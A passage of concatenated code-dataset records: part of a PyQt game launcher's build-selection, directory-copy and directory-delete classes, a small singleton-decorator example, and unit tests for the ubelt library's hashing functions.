self.platform_button_group.checkedButton()\n\n if selected_platform is self.x64_radio_button:\n selected_platform = 'x64'\n elif selected_platform is self.x86_radio_button:\n selected_platform = 'x86'\n\n if selected_branch is self.stable_radio_button:\n # Populate stable builds and stable changelog\n\n # Add stable builds\n\n builds = []\n\n for stable_version in cons.STABLE_ASSETS:\n version_details = cons.STABLE_ASSETS[stable_version]\n\n build = {\n 'url': version_details['Tiles'][selected_platform],\n 'name': version_details['name'],\n 'number': version_details['number'],\n 'date': arrow.get(version_details['released_on']).datetime\n }\n builds.append(build)\n \n builds.sort(key=lambda x: (x['date'], x['number']), reverse=True)\n self.builds = builds\n\n self.builds_combo.clear()\n\n for build in builds:\n if build['date'] is not None:\n build_date = arrow.get(build['date'], 'UTC')\n human_delta = safe_humanize(build_date, arrow.utcnow(),\n locale=self.app_locale)\n else:\n human_delta = _('Unknown')\n\n self.builds_combo.addItem(\n '{name} ({delta}) [{number}]'.format(name=build['name'], delta=human_delta,\n number=build['number']), userData=build)\n \n main_tab = self.get_main_tab()\n game_dir_group_box = main_tab.game_dir_group_box\n\n if not game_dir_group_box.game_started:\n self.builds_combo.setEnabled(True)\n else:\n self.previous_bc_enabled = True\n\n if game_dir_group_box.exe_path is not None:\n self.update_button.setText(_('Update game'))\n else:\n self.update_button.setText(_('Install game'))\n\n # Populate stable changelog\n\n self.changelog_content.setHtml(cons.STABLE_CHANGELOG)\n\n \n elif selected_branch is self.experimental_radio_button:\n release_asset = cons.BASE_ASSETS['Tiles'][selected_platform]\n release_new_asset = cons.NEW_BASE_ASSETS['Tiles'][selected_platform]\n\n self.start_lb_request(release_asset, release_new_asset)\n self.refresh_changelog()\n\n def refresh_changelog(self):\n self.changelog_content.setHtml(_('
<p>Changelog is not available for experimental</p>
    '))\n\n def branch_clicked(self, button):\n if button is self.stable_radio_button:\n config_value = cons.CONFIG_BRANCH_STABLE\n if button is self.experimental_radio_button:\n config_value = cons.CONFIG_BRANCH_EXPERIMENTAL\n \n set_config_value(cons.CONFIG_BRANCH_KEY, config_value)\n\n self.branch_changed()\n \n def branch_changed(self):\n # Perform branch change\n\n self.show_hide_find_build()\n\n # Change available builds and changelog\n self.refresh_builds()\n\n def platform_clicked(self, button):\n if button is self.x64_radio_button:\n config_value = 'x64'\n elif button is self.x86_radio_button:\n config_value = 'x86'\n\n set_config_value('platform', config_value)\n\n self.refresh_builds()\n\n\n# Recursively delete an entire directory tree while showing progress in a\n# status bar. Also display a dialog to retry the delete if there is a problem.\nclass ProgressRmTree(QTimer):\n completed = pyqtSignal()\n aborted = pyqtSignal()\n\n def __init__(self, src, status_bar, name):\n if not os.path.isdir(src):\n raise OSError(_(\"Source path '%s' is not a directory\") % src)\n\n super(ProgressRmTree, self).__init__()\n\n self.src = src\n\n self.status_bar = status_bar\n self.name = name\n\n self.started = False\n\n self.status_label = None\n self.progress_bar = None\n\n self.analysing = False\n self.deleting = False\n self.delete_completed = False\n\n def step(self):\n if self.analysing:\n if self.current_scan is None:\n self.current_scan = scandir(self.src)\n else:\n try:\n entry = next(self.current_scan)\n self.source_entries.append(entry)\n if entry.is_dir():\n self.next_scans.append(entry.path)\n elif entry.is_file():\n self.total_files += 1\n\n files_text = ngettext('file', 'files', self.total_files)\n\n self.status_label.setText(_('Analysing {name} - Found '\n '{file_count} {files}').format(\n name=self.name,\n file_count=self.total_files,\n files=files_text))\n\n except StopIteration:\n if len(self.next_scans) > 0:\n self.current_scan = scandir(self.next_scans.popleft())\n else:\n self.analysing = False\n\n if len(self.source_entries) > 0:\n self.deleting = True\n\n progress_bar = QProgressBar()\n progress_bar.setRange(0, self.total_files)\n progress_bar.setValue(0)\n self.status_bar.addWidget(progress_bar)\n self.progress_bar = progress_bar\n\n self.deleted_files = 0\n self.current_entry = None\n else:\n self.delete_completed = True\n self.stop()\n\n elif self.deleting:\n if self.current_entry is None:\n if len(self.source_entries) > 0:\n self.current_entry = self.source_entries.pop()\n self.display_entry(self.current_entry)\n else:\n # Remove the source directory\n while os.path.exists(self.src):\n try:\n try:\n os.rmdir(self.src)\n except OSError:\n # Remove read-only and try again\n os.chmod(self.src, stat.S_IWRITE)\n os.rmdir(self.src)\n except OSError as e:\n retry_msgbox = QMessageBox()\n retry_msgbox.setWindowTitle(\n _('Cannot remove directory'))\n\n process = None\n if e.filename is not None:\n process = find_process_with_file_handle(\n e.filename)\n\n text = _('''\n
<p>The launcher failed to remove the following directory: {directory}</p>\n<p>When trying to remove or access {filename}, the launcher raised the\nfollowing error: {error}</p>
    ''').format(\n directory=html.escape(self.src),\n filename=html.escape(e.filename),\n error=html.escape(e.strerror))\n\n if process is None:\n text = text + _('''\n
<p>No process seems to be using that file or directory.</p>
    ''')\n else:\n text = text + _('''\n
<p>The process {image_file_name} ({pid}) is currently using\nthat file or directory. You might need to end it if you want to retry.</p>
    '''\n ).format(\n image_file_name=process['image_file_name'],\n pid=process['pid'])\n\n retry_msgbox.setText(text)\n retry_msgbox.setInformativeText(_('Do you want to '\n 'retry removing this directory?'))\n retry_msgbox.addButton(\n _('Retry removing the directory'),\n QMessageBox.YesRole)\n retry_msgbox.addButton(_('Cancel the operation'),\n QMessageBox.NoRole)\n retry_msgbox.setIcon(QMessageBox.Critical)\n\n if retry_msgbox.exec() == 1:\n self.deleting = False\n self.stop()\n break\n\n self.deleting = False\n self.delete_completed = True\n self.stop()\n else:\n while os.path.exists(self.current_entry.path):\n try:\n if self.current_entry.is_dir():\n try:\n os.rmdir(self.current_entry.path)\n except OSError:\n # Remove read-only and try again\n os.chmod(self.current_entry.path, stat.S_IWRITE)\n os.rmdir(self.current_entry.path)\n elif self.current_entry.is_file():\n try:\n os.unlink(self.current_entry.path)\n except OSError:\n # Remove read-only and try again\n os.chmod(self.current_entry.path, stat.S_IWRITE)\n os.unlink(self.current_entry.path)\n except OSError as e:\n retry_msgbox = QMessageBox()\n retry_msgbox.setWindowTitle(\n _('Cannot remove directory'))\n\n process = None\n if e.filename is not None:\n process = find_process_with_file_handle(e.filename)\n\n text = _('''\n
<p>The launcher failed to remove the following directory: {directory}</p>\n<p>When trying to remove or access {filename}, the launcher raised the\nfollowing error: {error}</p>
    ''').format(\n directory=html.escape(self.src),\n filename=html.escape(e.filename),\n error=html.escape(e.strerror))\n\n if process is None:\n text = text + _('''\n
<p>No process seems to be using that file or directory.</p>
    ''')\n else:\n text = text + _('''\n
<p>The process {image_file_name} ({pid}) is currently using\nthat file or directory. You might need to end it if you want to retry.</p>
    '''\n ).format(image_file_name=process['image_file_name'],\n pid=process['pid'])\n\n retry_msgbox.setText(text)\n retry_msgbox.setInformativeText(_('Do you want to '\n 'retry removing this directory?'))\n retry_msgbox.addButton(\n _('Retry removing the directory'),\n QMessageBox.YesRole)\n retry_msgbox.addButton(_('Cancel the operation'),\n QMessageBox.NoRole)\n retry_msgbox.setIcon(QMessageBox.Critical)\n\n if retry_msgbox.exec() == 1:\n self.deleting = False\n self.stop()\n break\n\n self.current_entry = None\n self.deleted_files += 1\n\n self.progress_bar.setValue(self.deleted_files)\n def display_entry(self, entry):\n if self.status_label is not None:\n entry_rel_path = os.path.relpath(entry.path, self.src)\n self.status_label.setText(\n _('Deleting {name} - {entry}').format(name=self.name,\n entry=entry_rel_path))\n\n def start(self):\n self.started = True\n self.status_bar.clearMessage()\n self.status_bar.busy += 1\n\n self.analysing = True\n status_label = QLabel()\n status_label.setText(_('Analysing {name}').format(name=self.name))\n self.status_bar.addWidget(status_label, 100)\n self.status_label = status_label\n\n self.total_files = 0\n\n self.timeout.connect(self.step)\n\n self.current_scan = None\n self.next_scans = deque()\n self.source_entries = deque()\n\n super(ProgressRmTree, self).start(0)\n\n def stop(self):\n super(ProgressRmTree, self).stop()\n\n if self.started:\n self.status_bar.busy -= 1\n if self.status_label is not None:\n self.status_bar.removeWidget(self.status_label)\n if self.progress_bar is not None:\n self.status_bar.removeWidget(self.progress_bar)\n\n if self.delete_completed:\n self.completed.emit()\n else:\n self.aborted.emit()\n\n\n# Recursively copy an entire directory tree while showing progress in a\n# status bar. 
Optionally skip files or directories.\nclass ProgressCopyTree(QTimer):\n completed = pyqtSignal()\n aborted = pyqtSignal()\n\n def __init__(self, src, dst, skips, status_bar, name):\n if not os.path.isdir(src):\n raise OSError(_(\"Source path '%s' is not a directory\") % src)\n if os.path.exists(dst):\n raise OSError(_(\"Destination path '%s' already exists\") % dst)\n\n super(ProgressCopyTree, self).__init__()\n\n self.src = src\n self.dst = dst\n self.skips = skips\n\n self.status_bar = status_bar\n self.name = name\n\n self.started = False\n self.callback = None\n\n self.status_label = None\n self.copying_speed_label = None\n self.copying_size_label = None\n self.progress_bar = None\n\n self.source_file = None\n self.destination_file = None\n\n self.analysing = False\n self.copying = False\n self.copy_completed = False\n\n def step(self):\n if self.analysing:\n if self.current_scan is None:\n self.current_scan = scandir(self.src)\n else:\n try:\n entry = next(self.current_scan)\n if self.skips is None or entry.path not in self.skips:\n self.source_entries.append(entry)\n if entry.is_dir():\n self.next_scans.append(entry.path)\n elif entry.is_file():\n self.total_files += 1\n self.total_copy_size += entry.stat().st_size\n\n files_text = ngettext('file', 'files',\n self.total_files)\n\n self.status_label.setText(_('Analysing {name} - '\n 'Found {file_count} {files} ({size})').format(\n name=self.name,\n file_count=self.total_files,\n files=files_text,\n size=sizeof_fmt(self.total_copy_size)))\n\n except StopIteration:\n if len(self.next_scans) > 0:\n self.current_scan = scandir(self.next_scans.popleft())\n else:\n self.analysing = False\n\n os.makedirs(self.dst)\n\n if len(self.source_entries) > 0:\n self.copying = True\n\n copying_speed_label = QLabel()\n copying_speed_label.setText(_('{bytes_sec}/s'\n ).format(bytes_sec=sizeof_fmt(0)))\n self.status_bar.addWidget(copying_speed_label)\n self.copying_speed_label = copying_speed_label\n\n copying_size_label = QLabel()\n copying_size_label.setText(\n '{bytes_read}/{total_bytes}'\n .format(bytes_read=sizeof_fmt(0),\n total_bytes=sizeof_fmt(self.total_copy_size))\n )\n self.status_bar.addWidget(copying_size_label)\n self.copying_size_label = copying_size_label\n\n progress_bar = QProgressBar()\n progress_bar.setRange(0, self.total_copy_size)\n progress_bar.setValue(0)\n self.status_bar.addWidget(progress_bar)\n self.progress_bar = progress_bar\n\n self.copied_size = 0\n self.copied_files = 0\n self.copy_speed_count = 0\n self.last_copied_bytes = 0\n self.last_copied = datetime.utcnow()\n self.current_entry = None\n self.source_file = None\n self.destination_file = None\n else:\n self.copy_completed = True\n self.stop()\n\n elif self.copying:\n if self.current_entry is None:\n if len(self.source_entries) > 0:\n self.current_entry = self.source_entries.popleft()\n self.display_entry(self.current_entry)\n else:\n self.copying = False\n self.copy_completed = True\n self.stop()\n elif self.source_file is None and self.destination_file is None:\n relpath = os.path.relpath(self.current_entry.path, self.src)\n dstpath = os.path.join(self.dst, relpath)\n self.dstpath = dstpath\n\n if self.current_entry.is_dir():\n os.makedirs(dstpath)\n self.current_entry = None\n elif self.current_entry.is_file():\n filedir = os.path.dirname(dstpath)\n if not os.path.isdir(filedir):\n os.makedirs(filedir)\n self.source_file = open(self.current_entry.path, 'rb')\n self.destination_file = open(dstpath, 'wb')\n else:\n buf = 
self.source_file.read(cons.READ_BUFFER_SIZE)\n buf_len = len(buf)\n if buf_len == 0:\n self.source_file.close()\n self.destination_file.close()\n shutil.copystat(self.current_entry.path, self.dstpath)\n self.source_file = None\n self.destination_file = None\n self.current_entry = None\n\n self.copied_files += 1\n else:\n self.destination_file.write(buf)\n\n self.copied_size += buf_len\n self.progress_bar.setValue(self.copied_size)\n\n self.copy_speed_count += 1\n\n if self.copy_speed_count % 10 == 0:\n self.copying_size_label.setText(\n '{bytes_read}/{total_bytes}'\n .format(bytes_read=sizeof_fmt(self.copied_size),\n total_bytes=sizeof_fmt(self.total_copy_size))\n )\n\n delta_bytes = self.copied_size - self.last_copied_bytes\n delta_time = datetime.utcnow() - self.last_copied\n if delta_time.total_seconds() == 0:\n delta_time = timedelta.resolution\n\n bytes_secs = delta_bytes / delta_time.total_seconds()\n self.copying_speed_label.setText(_('{bytes_sec}/s'\n ).format(bytes_sec=sizeof_fmt(bytes_secs)))\n\n self.last_copied_bytes = self.copied_size\n self.last_copied = datetime.utcnow()\n\n\n def display_entry(self, entry):\n if self.status_label is not None:\n entry_rel_path = os.path.relpath(entry.path, self.src)\n self.status_label.setText(\n _('Copying {name} - {entry}').format(name=self.name,\n entry=entry_rel_path))\n\n def start(self):\n self.started = True\n self.status_bar.clearMessage()\n self.status_bar.busy += 1\n\n self.analysing = True\n status_label = QLabel()\n status_label.setText(_('Analysing {name}').format(name=self.name))\n self.status_bar.addWidget(status_label, 100)\n self.status_label = status_label\n\n self.total_copy_size = 0\n self.total_files = 0\n\n self.timeout.connect(self.step)\n\n self.current_scan = None\n self.next_scans = deque()\n self.source_entries = deque()\n\n super(ProgressCopyTree, self).start(0)\n\n def stop(self):\n super(ProgressCopyTree, self).stop()\n\n if self.started:\n self.status_bar.busy -= 1\n if self.status_label is not None:\n self.status_bar.removeWidget(self.status_label)\n if self.progress_bar is not None:\n self.status_bar.removeWidget(self.progress_bar)\n if self.copying_speed_label is not None:\n self.status_bar.removeWidget(self.copying_speed_label)\n if self.copying_size_label is not None:\n self.status_bar.removeWidget(self.copying_size_label)\n\n if self.source_file is not None:\n self.source_file.close()\n if self.destination_file is not None:\n self.destination_file.close()\n\n if self.copy_completed:\n self.completed.emit()\n else:\n self.aborted.emit()\n","repo_name":"remyroy/CDDA-Game-Launcher","sub_path":"cddagl/ui/views/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":141002,"program_lang":"python","lang":"en","doc_type":"code","stars":422,"dataset":"github-code","pt":"72"} +{"seq_id":"35566041252","text":"def single(cls):\n _instance={}\n def aa(*arg,**kwargs):\n if cls not in _instance:\n _instance[cls]=cls(*arg,**kwargs)\n print('========',_instance)\n return _instance[cls]\n return aa\n\n@single\nclass A(object):\n a = 1\n\n def __init__(self, x=0):\n self.x = x\n print('这是A的类的初始化方法')\n\n\na1 = A(2)\na2 = A(3)\nprint(id(a1), id(a2))","repo_name":"shangtianming/flask","sub_path":"2020-04-22/装饰器来写单例模式.py","file_name":"装饰器来写单例模式.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"24880497855","text":"import ubelt as ub\nimport itertools as it\nimport uuid\nimport pytest\nfrom ubelt.util_hash import 
_convert_hexstr_base, _ALPHABET_16\nfrom ubelt.util_hash import _hashable_sequence\nfrom ubelt.util_hash import _rectify_hasher\n\n\ntry:\n import numpy as np\nexcept ImportError:\n np = None\n\n\ndef _benchmark():\n \"\"\"\n On 64-bit processors sha512 may be faster than sha256\n\n References:\n https://crypto.stackexchange.com/questions/26336/sha512-faster-than-sha256\n \"\"\"\n result = ub.AutoOrderedDict()\n algos = ['sha1', 'sha256', 'sha512']\n for n in ub.ProgIter([1, 10, 100, 1000, 10000, 100000], desc='time'):\n # for key in hashlib.algorithms_guaranteed:\n for key in algos:\n hashtype = _rectify_hasher(key)\n t1 = ub.Timerit(100, bestof=10, label=key, verbose=0)\n for timer in t1:\n data = b'8' * n\n with timer:\n hasher = hashtype()\n hasher.update(data)\n result[key][n] = t1.min()\n import pandas as pd\n print(pd.DataFrame(result))\n\n result = ub.AutoOrderedDict()\n for n in ub.ProgIter([1, 10, 100, 1000, 10000, 100000], desc='time'):\n # for key in hashlib.algorithms_guaranteed:\n for key in algos:\n hashtype = _rectify_hasher(key)\n t1 = ub.Timerit(100, bestof=10, label=key, verbose=0)\n for timer in t1:\n data = b'8' * n\n hasher = hashtype()\n hasher.update(data)\n with timer:\n hasher.hexdigest()\n result[key][n] = t1.min()\n import pandas as pd\n print(pd.DataFrame(result))\n \"\"\"\n CommandLine:\n python -m test_hash _benchmark\n\n Example:\n >>> # DISABLE_DOCTEST\n >>> from test_hash import * # NOQA\n >>> result = _benchmark()\n >>> print(result)\n %timeit hashlib.sha256().update(b'8' * 1000)\n 3.62 µs per loop\n %timeit hashlib.sha512().update(b'8' * 1000)\n 2.5 µs per loop\n\n %timeit hashlib.sha256().update(b'8' * 1)\n 318 ns\n %timeit hashlib.sha512().update(b'8' * 1)\n 342 ns\n\n %timeit hashlib.sha256().update(b'8' * 100000)\n 306 µs\n %timeit hashlib.sha512().update(b'8' * 100000)\n 213 µs\n \"\"\"\n\n\ndef test_hash_data_with_types():\n if np is None:\n pytest.skip('requires numpy')\n counter = [0]\n failed = []\n def check_hash(want, input_):\n count = counter[0] = counter[0] + 1\n got = ub.hash_data(input_, hasher='sha512', base='abc', types=True)\n got = got[0:32]\n # assert got.startswith(want), 'want={}, got={}'.format(want, got)\n print('check_hash({!r}, {!r})'.format(got, input_))\n if want is not None and not got.startswith(want):\n item = (got, input_, count, want)\n failed.append(item)\n\n check_hash('egexcbwgdtmjrzafljtjwqpgfhmfetjs', '1')\n check_hash('hjvebphzylxgtxncyphclsjglvmstsbq', ['1'])\n check_hash('hjvebphzylxgtxncyphclsjglvmstsbq', tuple(['1']))\n check_hash('ftzqivzayzivmobwymodjnnzzxzrvvjz', b'12')\n check_hash('jiwjkgkffldfoysfqblsemzkailyridf', [b'1', b'2'])\n check_hash('foevisahdffoxfasicvyklrmuuwqnfcc', [b'1', b'2', b'3'])\n check_hash('foevisahdffoxfasicvyklrmuuwqnfcc', ['1', '2', '3'])\n check_hash('rkcnfxkjwkrfejhbpcpopmyubhbvonkt', ['1', np.array([1, 2, 3], dtype=np.int64), '3'])\n check_hash('lxssoxdkstvccsyqaybaokehclyctgmn', '123')\n check_hash('fpvptydigvgjimbzadztgpvjpqrevwcq', zip([1, 2, 3], [4, 5, 6]))\n\n print(ub.urepr(failed, nl=1))\n assert len(failed) == 0\n\n\ndef test_hash_data_without_types():\n if np is None:\n pytest.skip('requires numpy')\n counter = [0]\n failed = []\n def check_hash(want, input_):\n count = counter[0] = counter[0] + 1\n got = ub.hash_data(input_, hasher='sha1', base='hex', types=False)\n # assert got.startswith(want), 'want={}, got={}'.format(want, got)\n print('check_hash({!r}, {!r})'.format(got, input_))\n if want is not None and not got.startswith(want):\n item = (got, input_, count, 
want)\n failed.append(item)\n\n check_hash('356a192b7913b04c54574d18c28d46e6395428ab', '1')\n check_hash('d3bcc889aced30afd8e66ae45b310239d79be3df', ['1'])\n check_hash('d3bcc889aced30afd8e66ae45b310239d79be3df', ('1',))\n check_hash('7b52009b64fd0a2a49e6d8a939753077792b0554', b'12')\n check_hash('6bcab1cebcb44fc5c69faacc0ed661b19eff9fef', [b'1', b'2'])\n check_hash('d6d265a904bc7df97bd54a8c2ff4546e211c3cd8', [b'1', b'2', b'3'])\n check_hash('d6d265a904bc7df97bd54a8c2ff4546e211c3cd8', ['1', '2', '3'])\n check_hash('eff59c7c787bd223a680c9d625f54756be4fdf5b', ['1', np.array([1, 2, 3], dtype=np.int64), '3'])\n check_hash('40bd001563085fc35165329ea1ff5c5ecbdbbeef', '123')\n check_hash('1ba3c4e7f5af2a5f38d624047f422553ead2b5ae', zip([1, 2, 3], [4, 5, 6]))\n\n print(ub.urepr(failed, nl=1))\n assert len(failed) == 0\n\n\ndef test_available():\n assert 'sha1' in ub.util_hash._HASHERS.available()\n\n\ndef test_idempotency():\n # When we disable types and join sequence items, the hashable\n # sequence should be idempotent\n nested_data = ['fds', [3, 2, 3], {3: 2, '3': [3, 2, {3}]}, {1, 2, 3}]\n hashable1 = b''.join(_hashable_sequence(nested_data))\n hashable2 = b''.join(_hashable_sequence(hashable1, types=False))\n assert hashable1 == hashable2\n\n\ndef test_special_floats():\n # Tests a fix from version 0.10.3 for inf/nan floats\n # standard_floats = [0.0, 0.1, 0.2]\n data = [\n float('inf'), float('nan'), float('-inf'),\n -0., 0., -1., 1., 0.3, 0.1 + 0.2,\n ]\n expected_encoding = [\n b'_[_',\n b'FLTinf_,_',\n b'FLTnan_,_',\n b'FLT-inf_,_',\n b'FLT\\x00/\\x01_,_',\n b'FLT\\x00/\\x01_,_',\n b'FLT\\xff/\\x01_,_',\n b'FLT\\x01/\\x01_,_',\n b'FLT\\x13333333/@\\x00\\x00\\x00\\x00\\x00\\x00_,_',\n b'FLT\\x04\\xcc\\xcc\\xcc\\xcc\\xcc\\xcd/\\x10\\x00\\x00\\x00\\x00\\x00\\x00_,_',\n b'_]_']\n exepcted_prefix = '3196f80e17de93565f0fc57d98922a44'\n\n hasher = 'sha512'\n encoded = _hashable_sequence(data, types=True)\n hashed = ub.hash_data(data, hasher=hasher, types=True)[0:32]\n print('expected_encoding = {!r}'.format(expected_encoding))\n print('encoded = {!r}'.format(encoded))\n print('hashed = {!r}'.format(hashed))\n print('exepcted_prefix = {!r}'.format(exepcted_prefix))\n assert encoded == expected_encoding\n assert hashed == exepcted_prefix\n _sanity_check(data)\n\n\ndef test_hashable_sequence_sanity():\n data = [1, 2, [3.2, 5]]\n # data = [1]\n _sanity_check(data)\n\n\ndef _sanity_check(data):\n\n hasher_code = 'sha512'\n hasher_type = ub.util_hash._rectify_hasher(hasher_code)\n\n encoded_seq = _hashable_sequence(data, types=False)\n encoded_byt = b''.join(encoded_seq)\n hashed = ub.hash_data(data, hasher=hasher_code, types=False)\n rehashed = ub.hash_data(encoded_byt, hasher=hasher_code, types=False)\n\n hash_obj1 = hasher_type()\n hash_obj1.update(encoded_byt)\n hashed1 = hash_obj1.hexdigest()\n\n hash_obj2 = hasher_type()\n for item in encoded_seq:\n hash_obj2.update(item)\n hashed2 = hash_obj2.hexdigest()\n\n print('encoded_seq = {!r}'.format(encoded_seq))\n print('encoded_byt = {!r}'.format(encoded_byt))\n\n print('hashed = {!r}'.format(hashed))\n print('rehashed = {!r}'.format(rehashed))\n print('hashed1 = {!r}'.format(hashed1))\n print('hashed2 = {!r}'.format(hashed2))\n\n # Sanity check\n ub.hash_data(encoded_seq, hasher=hasher_code, types=False)\n\n seq2 = b''.join(_hashable_sequence(encoded_byt, types=False))\n assert encoded_byt == seq2\n\n tracer1 = ub.util_hash._HashTracer()\n ub.hash_data(encoded_byt, types=False, hasher=tracer1)\n traced_bytes1 = tracer1.hexdigest()\n 
print('traced_bytes1 = {!r}'.format(traced_bytes1))\n assert traced_bytes1 == encoded_byt\n\n tracer2 = ub.util_hash._HashTracer()\n ub.hash_data(encoded_byt, types=False, hasher=tracer2)\n traced_bytes2 = tracer1.hexdigest()\n print('traced_bytes2 = {!r}'.format(traced_bytes2))\n assert traced_bytes2 == traced_bytes1\n\n\ndef test_numpy_object_array():\n \"\"\"\n _HASHABLE_EXTENSIONS = ub.util_hash._HASHABLE_EXTENSIONS\n \"\"\"\n if np is None:\n pytest.skip('requires numpy')\n # An object array should have the same repr as a list of a tuple of data\n data = np.array([1, 2, 3], dtype=object)\n objhash = ub.hash_data(data)\n assert ub.hash_data([1, 2, 3]) == objhash\n assert ub.hash_data((1, 2, 3)) == objhash\n\n # Ensure this works when the object array is nested\n data = [np.array([1, 2, 3], dtype=object)]\n objhash = ub.hash_data(data)\n assert ub.hash_data([[1, 2, 3]]) == objhash\n assert ub.hash_data([(1, 2, 3)]) == objhash\n assert ub.hash_data(([1, 2, 3],)) == objhash\n\n\ndef test_ndarray_int_object_convert():\n if np is None:\n pytest.skip('requires numpy')\n data_list = [[1, 2, 3], [4, 5, 6]]\n\n data = np.array(data_list, dtype=np.int64)\n\n s1 = b''.join(_hashable_sequence(data.astype(object)))\n s2 = b''.join(_hashable_sequence(data_list))\n s3 = b''.join(_hashable_sequence(data.tolist()))\n s4 = b''.join(_hashable_sequence(data.astype(np.uint8).astype(object)))\n\n assert s1 == s4\n assert s2 == s4\n assert s3 == s4\n\n\ndef test_ndarray_zeros():\n if np is None:\n pytest.skip('requires numpy')\n data = np.zeros((3, 3), dtype=np.int64)\n hashid = ub.hash_data(data)\n assert hashid != ub.hash_data(data.ravel()), (\n 'shape should influence data')\n assert hashid != ub.hash_data(data.astype(np.float32))\n assert hashid != ub.hash_data(data.astype(np.int32))\n assert hashid != ub.hash_data(data.astype(np.int8))\n\n\ndef test_nesting():\n assert _hashable_sequence([1, 1, 1]) != _hashable_sequence([[1], 1, 1])\n assert _hashable_sequence([[1], 1]) != _hashable_sequence([[1, 1]])\n assert _hashable_sequence([1, [1]]) != _hashable_sequence([[1, 1]])\n assert _hashable_sequence([[[1]]]) != _hashable_sequence([[1]])\n\n\ndef test_numpy_int():\n if np is None:\n pytest.skip('requires numpy')\n assert _hashable_sequence(np.int8(3)) == _hashable_sequence(3)\n assert _hashable_sequence(np.int16(3)) == _hashable_sequence(3)\n assert _hashable_sequence(np.int32(3)) == _hashable_sequence(3)\n assert _hashable_sequence(np.int64(3)) == _hashable_sequence(3)\n assert _hashable_sequence(np.uint8(3)) == _hashable_sequence(3)\n assert _hashable_sequence(np.uint16(3)) == _hashable_sequence(3)\n assert _hashable_sequence(np.uint32(3)) == _hashable_sequence(3)\n assert _hashable_sequence(np.uint64(3)) == _hashable_sequence(3)\n\n\ndef test_numpy_float():\n if np is None:\n pytest.skip('requires numpy')\n assert _hashable_sequence(np.float16(3.0)) == _hashable_sequence(3.0)\n assert _hashable_sequence(np.float32(3.0)) == _hashable_sequence(3.0)\n assert _hashable_sequence(np.float64(3.0)) == _hashable_sequence(3.0)\n try:\n assert _hashable_sequence(np.float128(3.0)) == _hashable_sequence(3.0)\n except AttributeError:\n pass\n\n\ndef test_numpy_random_state():\n if np is None:\n pytest.skip('requires numpy')\n data = np.random.RandomState(0)\n # assert ub.hash_data(data).startswith('ujsidscotcycsqwnkxgbsxkcedplzvytmfmr')\n assert ub.hash_data(data, hasher='sha512', types=True, base='abc').startswith('snkngbxghabesvowzalqtvdvjtvslmxve')\n # _hashable_sequence(data)\n\n\ndef test_uuid():\n data = 
uuid.UUID('12345678-1234-1234-1234-123456789abc')\n sequence = b''.join(_hashable_sequence(data, types=True))\n assert sequence == b'UUID\\x124Vx\\x124\\x124\\x124\\x124Vx\\x9a\\xbc'\n assert ub.hash_data(data, types=True, base='abc', hasher='sha512').startswith('nkklelnjzqbi')\n assert ub.hash_data(data.bytes, types=True) != ub.hash_data(data, types=True), (\n 'the fact that it is a UUID should reflect in the hash')\n assert ub.hash_data(data.bytes, types=False) == ub.hash_data(data, types=False), (\n 'the hash should be equal when ignoring types')\n\n\ndef test_hash_data_custom_base():\n data = 1\n # A larger base means the string can be shorter\n hashid_26 = ub.hash_data(data, base='abc', hasher='sha512', types=True)\n assert len(hashid_26) == 109\n # assert hashid_26.startswith('lejivmqndqzp')\n assert hashid_26.startswith('rfsmlqsjsuzllgp')\n hashid_16 = ub.hash_data(data, base='hex', hasher='sha512', types=True)\n # assert hashid_16.startswith('8bf2a1f4dbea6e59e5c2ec4077498c44')\n assert hashid_16.startswith('d7c9cea9373eb7ba20444ec65e0186b')\n\n assert len(hashid_16) == 128\n # Binary should have len 512 because the default hasher is sha512\n hashid_2 = ub.hash_data(data, base=['0', '1'], hasher='sha512', types=True)\n assert len(hashid_2) == 512\n assert hashid_2.startswith('110101111100100111001110101010010')\n\n\ndef test_hash_file():\n fpath = ub.Path.appdir('ubelt/tests').ensuredir() / 'tmp.txt'\n fpath.write_text('foobar')\n hashid1_a = ub.hash_file(fpath, hasher='sha512', stride=1, blocksize=1)\n hashid2_a = ub.hash_file(fpath, hasher='sha512', stride=2, blocksize=1)\n\n hashid1_b = ub.hash_file(fpath, hasher='sha512', stride=1, blocksize=10)\n hashid2_b = ub.hash_file(fpath, hasher='sha512', stride=2, blocksize=10)\n\n assert hashid1_a == hashid1_b\n assert hashid2_a != hashid2_b, 'blocksize matters when stride is > 1'\n assert hashid1_a != hashid2_a\n\n hashid3_c = ub.hash_file(fpath, hasher='sha512', stride=2, blocksize=10, maxbytes=1000)\n assert hashid3_c == hashid2_b\n\n\ndef test_empty_hash_file():\n fpath = ub.Path.appdir('ubelt/tests').ensuredir() / 'tmp.txt'\n fpath.write_bytes(b'')\n a = ub.hash_file(fpath, hasher='sha512', stride=1, blocksize=1)\n b = ub.hash_file(fpath, hasher='sha512', stride=4, blocksize=4)\n c = ub.hash_file(fpath, hasher='sha512', stride=4, blocksize=4, maxbytes=1)\n d = ub.hash_file(fpath, hasher='sha512', stride=1, blocksize=4, maxbytes=0)\n assert a == b == c == d\n\n\ndef test_convert_base_hex():\n # Test that hex values are unchanged\n for i in it.chain(range(-10, 10), range(-1000, 1000, 7)):\n text = hex(i).replace('0x', '')\n assert _convert_hexstr_base(text, _ALPHABET_16) == text, (\n 'should not change hex')\n\n\ndef test_convert_base_decimal():\n base_10 = list(map(str, range(10)))\n # Test that decimal values agree with python conversion\n for i in it.chain(range(-10, 10), range(-1000, 1000, 7)):\n text_16 = hex(i).replace('0x', '')\n text_10 = _convert_hexstr_base(text_16, base_10)\n assert int(text_16, 16) == int(text_10, 10)\n\n\ndef test_convert_base_simple():\n # Quick one-of tests\n assert _convert_hexstr_base('aaa0111', _ALPHABET_16) == 'aaa0111'\n\n assert _convert_hexstr_base('aaa0111', list('01')) == '1010101010100000000100010001'\n assert _convert_hexstr_base('aaa0111', list('012')) == '110110122202020220'\n assert _convert_hexstr_base('aaa0111', list('0123')) == '22222200010101'\n\n base_10 = list(map(str, range(10)))\n assert _convert_hexstr_base('aaa0111', base_10) == '178913553'\n\n\ndef test_no_prefix():\n full = 
